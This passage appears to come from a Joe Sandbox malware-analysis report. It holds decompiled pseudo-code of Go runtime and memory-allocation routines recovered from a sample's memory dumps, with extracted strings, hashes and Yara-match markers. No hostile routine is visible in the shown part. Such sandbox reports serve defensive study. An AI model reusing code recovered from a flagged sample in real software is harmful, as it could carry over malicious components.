                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xa0)), _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v16 =  *((intOrPtr*)(_a8 + 0x98));
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x1387155, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0x98)), _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v16 =  *((intOrPtr*)(_a8 + 0xb8));
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x1387105, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xb8)), _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v16 =  *((intOrPtr*)(_a8 + 0xc0));
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x138710d, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xc0)), _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v16 =  *((intOrPtr*)(_a8 + 0xc8));
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x13870d5, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xc8)), _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v16 =  *((intOrPtr*)(_a8 + 0xd0));
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x13870dd, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xd0)), _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v16 =  *((intOrPtr*)(_a8 + 0xd8));
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x13870e5, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xd8)), _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v16 =  *((intOrPtr*)(_a8 + 0xe0));
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x13870ed, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xe0)), _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v16 =  *((intOrPtr*)(_a8 + 0xe8));
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x13870f5, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xe8)), _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v16 =  *((intOrPtr*)(_a8 + 0xf0));
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x13870fd, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xf0)), _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_t295 =  *((intOrPtr*)(_a8 + 0xf8));
                                                                                                                            				_v16 = _t295;
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40(_t209, _t214, _t215, _t216, 0x1387145, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v16, _t295, _t298, _t303);
                                                                                                                            				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v24 = _t295;
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40( *((intOrPtr*)(_a8 + 0x44)), _t214, _t215, _t216, 0x138713d, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v24, _t295, _t298, _t303);
                                                                                                                            				E013325A0( *((intOrPtr*)(_a8 + 0x44)), _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v24 = _t295;
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40( *(_a8 + 0x38) & 0x0000ffff, _t214, _t215, _t216, 0x13870a5, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v24, _t295, _t298, _t303);
                                                                                                                            				E013325A0( *(_a8 + 0x38) & 0x0000ffff, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v24 = _t295;
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40( *(_a8 + 0x3e) & 0x0000ffff, _t214, _t215, _t216, 0x13870b5, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v24, _t295, _t298, _t303);
                                                                                                                            				E013325A0( *(_a8 + 0x3e) & 0x0000ffff, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				L013323C0(_t296, _t298, _t303);
                                                                                                                            				_v24 = _a8;
                                                                                                                            				E01332340(_t296, _t298, _t303);
                                                                                                                            				E01332C40( *(_a8 + 0x3e) & 0x0000ffff, _t214, _t215, _t216, 0x13870bd, _t279, _t298, _t303);
                                                                                                                            				L01332AA0(_t213, _t214, _t216, _v24, _t295, _t298, _t303);
                                                                                                                            				E013325A0( *(_a8 + 0x3e) & 0x0000ffff, _t213, _t214, _t215, _t216, _t298, _t303);
                                                                                                                            				return L013323C0(_t296, _t298, _t303);
                                                                                                                            			}















                                                                                                                            0x01306471
                                                                                                                            0x01306480
                                                                                                                            0x01306485
                                                                                                                            0x0130648a
                                                                                                                            0x01306498
                                                                                                                            0x013064a0
                                                                                                                            0x013064b1
                                                                                                                            0x013064c0
                                                                                                                            0x013064c5
                                                                                                                            0x013064ca
                                                                                                                            0x013064d8
                                                                                                                            0x013064e0
                                                                                                                            0x013064f1
                                                                                                                            0x01306500
                                                                                                                            0x01306505
                                                                                                                            0x0130650a
                                                                                                                            0x01306518
                                                                                                                            0x01306520
                                                                                                                            0x01306531
                                                                                                                            0x01306540
                                                                                                                            0x01306545
                                                                                                                            0x01306558

                                                                                                                            Strings
                                                                                                                            • r8 r9 rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [, xrefs: 01306225
                                                                                                                            • r10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) locke, xrefs: 013062A5
                                                                                                                            • cs deadlockfs gs no anodepollDescr10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) ->, xrefs: 013064A5
                                                                                                                            • rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limi, xrefs: 0130606B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: cs deadlockfs gs no anodepollDescr10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) ->$r10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) locke$r8 r9 rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [$rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limi
                                                                                                                            • API String ID: 0-306986522
                                                                                                                            • Opcode ID: a647b83c42b85ec4ad8254faa1e116200addcd464e394672967bc89e388f3230
                                                                                                                            • Instruction ID: b98606bb4ef7b202a82bc359fa1b67c6110c07130291fb5d743d2505486de21d
                                                                                                                            • Opcode Fuzzy Hash: a647b83c42b85ec4ad8254faa1e116200addcd464e394672967bc89e388f3230
                                                                                                                            • Instruction Fuzzy Hash: 9DC13E36224B82C6D604FB69E09039FBB64FBE9B58F915461EE8E07734DF38C1848765
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$AllocateHeap_callnewhmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 106865790-0
                                                                                                                            • Opcode ID: da613b10c635bb53595de3890cf4312cf93c54fb4ceadec304ad535f12f7aa3f
                                                                                                                            • Instruction ID: 7f1a03c8ed2d4472f529bd03af496ebca6ddbafd9ffe04bea678e51e9d74a96e
                                                                                                                            • Opcode Fuzzy Hash: da613b10c635bb53595de3890cf4312cf93c54fb4ceadec304ad535f12f7aa3f
                                                                                                                            • Instruction Fuzzy Hash: 9D61A232318E084BEF5AEB289C597BD72D1FB99321F300959F44BC36A6DF34D9024699
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3442832105-0
                                                                                                                            • Opcode ID: 1a5a18beb717bc35b45f0e5d1d5b8149514bbbff4660083c558cafeb3ce1d956
                                                                                                                            • Instruction ID: ad5a8ee27068fdb5bd0d95846bd9ed5f3bbf39812119b10dd886c07b046f03f5
                                                                                                                            • Opcode Fuzzy Hash: 1a5a18beb717bc35b45f0e5d1d5b8149514bbbff4660083c558cafeb3ce1d956
                                                                                                                            • Instruction Fuzzy Hash: D061D331608E488FEF45EF68DC89BAA73E5FB94315F10412AF44AC31A2DF34D9058B96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2803490479-0
                                                                                                                            • Opcode ID: c706e39704bd44a9878f2aa0e02bcf58b57e69b0f9630ed7c1a844afd8d2510b
                                                                                                                            • Instruction ID: b6ae1a1fa0d565402ee9934260abbf7b520d59561d19a5900390f3baeda2276b
                                                                                                                            • Opcode Fuzzy Hash: c706e39704bd44a9878f2aa0e02bcf58b57e69b0f9630ed7c1a844afd8d2510b
                                                                                                                            • Instruction Fuzzy Hash: 5451B632218E054BEF59DF289C8927933D1FB85321F24456DF89BC3697EB30EC528698
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 80%
                                                                                                                            			E0130BB60(signed int __edx, signed int __rax, signed int __rbx, long long __rcx, long long __rbp, void* __r14, signed int _a8, signed long long _a16, long long _a24) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				signed int* _v24;
                                                                                                                            				long long _v32;
                                                                                                                            				signed int _v40;
                                                                                                                            				signed long long _v48;
                                                                                                                            				signed char _t60;
                                                                                                                            				void* _t64;
                                                                                                                            				signed int _t76;
                                                                                                                            				void* _t77;
                                                                                                                            				signed int _t83;
                                                                                                                            				intOrPtr _t86;
                                                                                                                            				signed long long _t95;
                                                                                                                            				signed long long _t98;
                                                                                                                            				long long _t103;
                                                                                                                            				long long _t105;
                                                                                                                            				signed int* _t106;
                                                                                                                            				signed int _t108;
                                                                                                                            				intOrPtr _t109;
                                                                                                                            				long long _t112;
                                                                                                                            				signed long long _t118;
                                                                                                                            				void* _t125;
                                                                                                                            				signed int* _t126;
                                                                                                                            				signed int* _t129;
                                                                                                                            				void* _t133;
                                                                                                                            				void* _t137;
                                                                                                                            				signed long long _t139;
                                                                                                                            				void* _t140;
                                                                                                                            				signed long long _t141;
                                                                                                                            				void* _t142;
                                                                                                                            				void* _t143;
                                                                                                                            				void* _t144;
                                                                                                                            				void* _t145;
                                                                                                                            				void* _t146;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t145 = __r14;
                                                                                                                            					_t130 = __rbp;
                                                                                                                            					_t103 = __rcx;
                                                                                                                            					_t95 = __rbx;
                                                                                                                            					_t83 = __rax;
                                                                                                                            					_t76 = __edx;
                                                                                                                            					if(_t133 <=  *((intOrPtr*)(__r14 + 0x18))) {
                                                                                                                            						goto L33;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t130 =  &_v8;
                                                                                                                            					if(__rax == 0) {
                                                                                                                            						L32:
                                                                                                                            						_t83 = 0x138b361;
                                                                                                                            						E01330BA0(0x138b361, _t95, _t130);
                                                                                                                            						goto L33;
                                                                                                                            					}
                                                                                                                            					L2:
                                                                                                                            					if(__rbx != 0) {
                                                                                                                            						L3:
                                                                                                                            						if((__rbx & __rbx - 0x00000001) != 0) {
                                                                                                                            							L31:
                                                                                                                            							E01330BA0(0x138db66, _t95, _t130);
                                                                                                                            							goto L32;
                                                                                                                            						} else {
                                                                                                                            							L4:
                                                                                                                            							_t82 = __rbx - 0x2000;
                                                                                                                            							if(__rbx > 0x2000) {
                                                                                                                            								L5:
                                                                                                                            								E01330BA0(0x138cedd, __rbx,  &_v8);
                                                                                                                            								goto L31;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L7:
                                                                                                                            					__eflags = _t83 - 0x10000;
                                                                                                                            					if(_t83 >= 0x10000) {
                                                                                                                            						L16:
                                                                                                                            						return E01313060(_t83, _t103, _t130);
                                                                                                                            					} else {
                                                                                                                            						L8:
                                                                                                                            						_a24 = _t103;
                                                                                                                            						_a8 = _t83;
                                                                                                                            						_v48 = _t95;
                                                                                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x30)) + 0xd8)) =  *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x30)) + 0xd8)) + 1;
                                                                                                                            						_t108 =  *((intOrPtr*)(_t145 + 0x30));
                                                                                                                            						_v32 = _t108;
                                                                                                                            						__eflags = _t108;
                                                                                                                            						if(_t108 == 0) {
                                                                                                                            							L11:
                                                                                                                            							_t64 = E01309600(0x14cf570, _t108, _t130, _t145);
                                                                                                                            							_t83 = _a8;
                                                                                                                            							_t105 = _a24;
                                                                                                                            							_t109 = _v32;
                                                                                                                            							_t95 = _v48;
                                                                                                                            							_t126 = 0x14cf578;
                                                                                                                            						} else {
                                                                                                                            							L9:
                                                                                                                            							_t129 =  *((intOrPtr*)(_t108 + 0xa0));
                                                                                                                            							__eflags = _t129;
                                                                                                                            							if(_t129 == 0) {
                                                                                                                            								goto L11;
                                                                                                                            							} else {
                                                                                                                            								L10:
                                                                                                                            								__eflags =  *_t129 & _t60;
                                                                                                                            								_t126 =  &(_t129[0x47c]);
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						L12:
                                                                                                                            						_v24 = _t126;
                                                                                                                            						_t98 =  ~_t95;
                                                                                                                            						_v40 = _t98;
                                                                                                                            						_t118 = _t95 + _t126[2] - 0x00000001 & _t98;
                                                                                                                            						_t126[2] = _t118;
                                                                                                                            						__eflags = _t118 + _t83 - 0x40000;
                                                                                                                            						if(_t118 + _t83 > 0x40000) {
                                                                                                                            							L14:
                                                                                                                            							_t64 = E01313060(_t83, 0x14d10a0, _t130);
                                                                                                                            							_t106 = _v24;
                                                                                                                            							 *_t106 = _t83;
                                                                                                                            							__eflags =  *_t106;
                                                                                                                            							if(__eflags != 0) {
                                                                                                                            								goto L25;
                                                                                                                            							} else {
                                                                                                                            								L15:
                                                                                                                            								__eflags = _t106 - 0x14cf578;
                                                                                                                            								if(_t106 == 0x14cf578) {
                                                                                                                            									L29:
                                                                                                                            									E01309820(0x14cf570, _t130, _t145);
                                                                                                                            									goto L28;
                                                                                                                            								} else {
                                                                                                                            									L28:
                                                                                                                            									E01330BA0(0x138c496, 0x14d10a0, _t130);
                                                                                                                            									goto L29;
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            							do {
                                                                                                                            								goto L25;
                                                                                                                            							} while (__eflags == 0);
                                                                                                                            							_t106[2] = _v48 + 0x00000007 & _v40;
                                                                                                                            							_t83 = _a8;
                                                                                                                            							_t109 = _v32;
                                                                                                                            							_t126 = _t106;
                                                                                                                            							_t105 = _a24;
                                                                                                                            							goto L17;
                                                                                                                            							L25:
                                                                                                                            							_t86 =  *0x14cf460; // 0x25bf8a20000
                                                                                                                            							 *( *_t106) = _t86;
                                                                                                                            							asm("lock dec eax");
                                                                                                                            							_t76 = _t76 & 0xffffff00 | __eflags == 0x00000000;
                                                                                                                            							__eflags = _t76;
                                                                                                                            						} else {
                                                                                                                            							L13:
                                                                                                                            							__eflags =  *_t126;
                                                                                                                            							if( *_t126 == 0) {
                                                                                                                            								goto L14;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						L17:
                                                                                                                            						_t139 = _t126[2];
                                                                                                                            						_t141 = _t83 + _t139;
                                                                                                                            						_t126[2] = _t141;
                                                                                                                            						r9d =  *((intOrPtr*)(_t109 + 0xd8));
                                                                                                                            						_t34 = _t141 - 1; // -1
                                                                                                                            						r10d = _t34;
                                                                                                                            						 *((intOrPtr*)(_t109 + 0xd8)) = r10d;
                                                                                                                            						_t112 =  *_t126 + _t139;
                                                                                                                            						__eflags = r9d - 1;
                                                                                                                            						if(r9d == 1) {
                                                                                                                            							__eflags =  *((char*)(_t145 + 0xb1));
                                                                                                                            							if( *((char*)(_t145 + 0xb1)) != 0) {
                                                                                                                            								 *((long long*)(_t145 + 0x10)) = 0xfffffade;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						_v16 = _t112;
                                                                                                                            						__eflags = _t126 - 0x14cf578;
                                                                                                                            						if(_t126 == 0x14cf578) {
                                                                                                                            							_t64 = E01309820(0x14cf570, _t130, _t145);
                                                                                                                            							_t83 = _a8;
                                                                                                                            							_t105 = _a24;
                                                                                                                            							_t112 = _v16;
                                                                                                                            						}
                                                                                                                            						__eflags = _t105 - 0x14d10a0;
                                                                                                                            						if(_t105 != 0x14d10a0) {
                                                                                                                            							_t64 = E0132A040(E0132A040(_t64, _t105, _t83, 0x14d10a0, _t130, _t145), 0x14d10a0,  ~_a8, 0x14d10a0, _t130, _t145);
                                                                                                                            							_t112 = _v16;
                                                                                                                            						}
                                                                                                                            						L24:
                                                                                                                            						return _t64;
                                                                                                                            					}
                                                                                                                            					L34:
                                                                                                                            					L33:
                                                                                                                            					_a8 = _t83;
                                                                                                                            					_a16 = _t95;
                                                                                                                            					_a24 = _t103;
                                                                                                                            					E0135A8C0(_t76, _t77, _t82, _t95, _t103, _t125, _t130, _t137, _t140, _t142, _t143, _t144, _t146);
                                                                                                                            				}
                                                                                                                            			}





































                                                                                                                            0x0130bd5a
                                                                                                                            0x0130bd5f
                                                                                                                            0x0130bd62
                                                                                                                            0x0130bc53
                                                                                                                            0x0130bc53
                                                                                                                            0x0130bc53
                                                                                                                            0x0130bc57
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0130bc57
                                                                                                                            0x0130bc97
                                                                                                                            0x0130bc9a
                                                                                                                            0x0130bc9e
                                                                                                                            0x0130bca2
                                                                                                                            0x0130bca7
                                                                                                                            0x0130bcae
                                                                                                                            0x0130bcae
                                                                                                                            0x0130bcb2
                                                                                                                            0x0130bcb9
                                                                                                                            0x0130bcc0
                                                                                                                            0x0130bcc4
                                                                                                                            0x0130bcc6
                                                                                                                            0x0130bcce
                                                                                                                            0x0130bcd0
                                                                                                                            0x0130bcd0
                                                                                                                            0x0130bcce
                                                                                                                            0x0130bcd8
                                                                                                                            0x0130bce4
                                                                                                                            0x0130bce7
                                                                                                                            0x0130bcf2
                                                                                                                            0x0130bcf7
                                                                                                                            0x0130bcfc
                                                                                                                            0x0130bd01
                                                                                                                            0x0130bd01
                                                                                                                            0x0130bd0d
                                                                                                                            0x0130bd10
                                                                                                                            0x0130bd2c
                                                                                                                            0x0130bd31
                                                                                                                            0x0130bd31
                                                                                                                            0x0130bd36
                                                                                                                            0x0130bd42
                                                                                                                            0x0130bd42
                                                                                                                            0x00000000
                                                                                                                            0x0130bdf7
                                                                                                                            0x0130bdf7
                                                                                                                            0x0130bdfc
                                                                                                                            0x0130be01
                                                                                                                            0x0130be06
                                                                                                                            0x0130be15

                                                                                                                            Strings
                                                                                                                            • persistentalloc: align is not a power of 2runtime: blocked write on closing polldescunexpected signal during runtime executiongcBgMarkWorker: unexpected gcMarkWorkerModegrew heap, but no adequate free space foundheapBitsSetTypeGCProg: unexpected bit countinter, xrefs: 0130BDD0
                                                                                                                            • persistentalloc: size == 0required key not availableruntime: bad span s.state=runtime: pcHeader: magic= shrinking stack in libcallstartlockedm: locked to meuse of invalid sweepLocker not in stack roots range [CertEnumCertificatesInStoreEaster Island Standard T, xrefs: 0130BDE5
                                                                                                                            • persistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: createevent failed; errno=traceback did not unwind completelytransport endpoint is not connected) is larger than maximum page size () is not Grunn, xrefs: 0130BDBF
                                                                                                                            • runtime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x] (types from different packages)CertAddCertificateContextToStoreCertVerifyCertificateChainPolicyWSAGetOve, xrefs: 0130BD9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: persistentalloc: align is not a power of 2runtime: blocked write on closing polldescunexpected signal during runtime executiongcBgMarkWorker: unexpected gcMarkWorkerModegrew heap, but no adequate free space foundheapBitsSetTypeGCProg: unexpected bit countinter$persistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: createevent failed; errno=traceback did not unwind completelytransport endpoint is not connected) is larger than maximum page size () is not Grunn$persistentalloc: size == 0required key not availableruntime: bad span s.state=runtime: pcHeader: magic= shrinking stack in libcallstartlockedm: locked to meuse of invalid sweepLocker not in stack roots range [CertEnumCertificatesInStoreEaster Island Standard T$runtime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x] (types from different packages)CertAddCertificateContextToStoreCertVerifyCertificateChainPolicyWSAGetOve
                                                                                                                            • API String ID: 0-2789303706
                                                                                                                            • Opcode ID: 9ad4976b388e7791bdf19bd70da9cdec7523b899339accf84b277bab2e5ec9a5
                                                                                                                            • Instruction ID: 2eccd90706c6bb6604de6dfc1854288eb8114e56900cb8785b6358d5cc5a36b2
                                                                                                                            • Opcode Fuzzy Hash: 9ad4976b388e7791bdf19bd70da9cdec7523b899339accf84b277bab2e5ec9a5
                                                                                                                            • Instruction Fuzzy Hash: 93615376605B8582DA12DF09E49039AFBA5F389BD8F849122EB8D13B69DF38C585C700
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 60%
                                                                                                                            			E01336F40(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, long long __rax, long long __rdx, void* __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, void* __r11, void* __r12, void* __r13, void* __r14, void* __r15, long long _a8, signed int _a16) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				long long _v32;
                                                                                                                            				long long _v40;
                                                                                                                            				void* _t59;
                                                                                                                            				signed int _t63;
                                                                                                                            				void* _t64;
                                                                                                                            				void* _t71;
                                                                                                                            				void* _t73;
                                                                                                                            				void* _t80;
                                                                                                                            				void* _t86;
                                                                                                                            				signed int _t87;
                                                                                                                            				void* _t91;
                                                                                                                            				intOrPtr _t92;
                                                                                                                            				void* _t93;
                                                                                                                            				void* _t94;
                                                                                                                            				long long _t99;
                                                                                                                            				intOrPtr _t112;
                                                                                                                            				intOrPtr _t114;
                                                                                                                            				long long _t120;
                                                                                                                            				intOrPtr _t121;
                                                                                                                            				intOrPtr _t123;
                                                                                                                            				long long _t125;
                                                                                                                            				void* _t127;
                                                                                                                            				intOrPtr _t128;
                                                                                                                            				void* _t133;
                                                                                                                            				void* _t138;
                                                                                                                            				void* _t139;
                                                                                                                            				intOrPtr _t140;
                                                                                                                            				void* _t141;
                                                                                                                            				void* _t142;
                                                                                                                            				void* _t143;
                                                                                                                            				void* _t144;
                                                                                                                            				void* _t145;
                                                                                                                            				void* _t146;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t146 = __r15;
                                                                                                                            					_t145 = __r14;
                                                                                                                            					_t144 = __r13;
                                                                                                                            					_t143 = __r12;
                                                                                                                            					_t142 = __r11;
                                                                                                                            					_t141 = __r10;
                                                                                                                            					_t139 = __r9;
                                                                                                                            					_t138 = __r8;
                                                                                                                            					_t129 = __rbp;
                                                                                                                            					_t127 = __rsi;
                                                                                                                            					_t124 = __rdx;
                                                                                                                            					_t103 = __rax;
                                                                                                                            					_t94 = __esp;
                                                                                                                            					_t93 = __esi;
                                                                                                                            					_t91 = __edi;
                                                                                                                            					_t86 = __edx;
                                                                                                                            					_t80 = __ecx;
                                                                                                                            					_t74 = __ebx;
                                                                                                                            					if(_t133 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L34;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t129 =  &_v8;
                                                                                                                            					_a8 = __rax;
                                                                                                                            					_a16 = __ebx;
                                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)(__r14 + 0x30)) + 0xd8)) =  *((intOrPtr*)( *((intOrPtr*)(__r14 + 0x30)) + 0xd8)) + 1;
